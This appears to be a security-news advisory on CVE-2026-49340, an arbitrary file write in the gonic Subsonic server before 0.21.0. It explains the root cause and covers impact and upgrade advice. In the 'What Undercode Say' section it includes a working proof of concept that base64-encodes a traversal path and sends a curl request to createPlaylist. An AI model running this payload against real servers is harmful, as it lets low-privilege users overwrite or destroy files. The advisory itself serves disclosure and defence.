Listen to this Post
CVE-2026-49340 is a critical vulnerability in gonic, a free-software Subsonic server API implementation. Prior to version 0.21.0, a logic error in the `ServeCreateOrUpdatePlaylist` function allows any authenticated Subsonic user—including those without administrative privileges—to write playlist M3U content to an attacker-controlled absolute filesystem path on the gonic host.
The vulnerability is rooted in two distinct flaws:
- Unreachable Guard Clause: The function attempts to read an existing playlist using
c.playlistStore.Read(playlistPath). This function returns `(Playlist, nil)` on success and `(nil, err)` on any failure. However, the conditional check iserr != nil && pl != nil, a condition that is mathematically impossible to satisfy. Consequently, the ownership check (playlist.UserID != 0 && playlist.UserID != user.ID) is bypassed, as `playlist` remains at its zero value whereUserID = 0. - No Path Containment in
Store.Write: The `Store.Write` function uses `filepath.Join(s.basePath, relPath)` to construct the destination path. Go’s `filepath.Join` does not prevent directory traversal sequences like... An attacker can therefore supply a relative path such as../../etc/cron.daily/anything, causing the file to be written outside the intended `playlists/` directory.
Furthermore, the `os.MkdirAll` call creates intermediate directories with world-writable `0o777` permissions, posing an additional hardening concern. This bug is independent of CVE-2026-49338 and CVE-2026-49339.
The issue was patched in version 0.21.0.
DailyCVE Form
Platform: …….
Gonic
Version: ……..
< 0.21.0
Vulnerability :……
Arbitrary File Write
Severity: …….
High (CVSS 8.1)
date: ……….
2026-06-19
Prediction: here you should include expected Patch date.
Already Patched (0.21.0)
What Undercode Say
Encode a traversal path to a writeable location (e.g., /var/log/anything.log) RAW='../../../var/log/anything.log' ID="pl-$(printf '%s' "$RAW" | base64 -w0 | tr '/+' '_-')" Exploit the vulnerability via the createPlaylist endpoint curl -s "http://gonic-host/rest/createPlaylist.view?u=lowpriv&p=pass&c=poc&v=1.16.1&f=json&id=$ID&name=injected"
Exploit
An attacker can exploit this by:
- Encoding a malicious path (e.g.,
../../../var/log/anything.log) into a Base64-encoded playlist ID. - Sending a crafted request to the `/rest/createPlaylist.view` endpoint.
- The server, due to the unreachable guard and lack of path containment, writes the M3U playlist content to the attacker-specified path.
- The `os.MkdirAll` call creates any necessary parent directories with `0o777` permissions.
Protection
- Upgrade gonic: Immediately upgrade to version 0.21.0 or later.
- Restrict User Permissions: Review and limit write permissions for users to reduce exposure.
- Implement a Web Application Firewall: Deploy a WAF to block malicious traffic patterns.
- Active Monitoring: Utilize cybersecurity alerts to stay informed about potential threats.
Impact
- Integrity: Any authenticated user can overwrite (truncate-and-rewrite) any file the gonic process has write access to. This includes gonic’s own SQLite database, configuration files, log files, cache, and audit trails.
- Availability: Overwriting `gonic.db` destroys all user state—accounts, ratings, playlists, etc.—in an unrecoverable manner.
- Filesystem State: `MkdirAll(dir, 0o777)` creates intermediate directories as world-writable, regardless of the umask.
- Trust Boundary: gonic explicitly supports a non-admin user role. This bug grants every non-admin user a destructive filesystem-write primitive.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

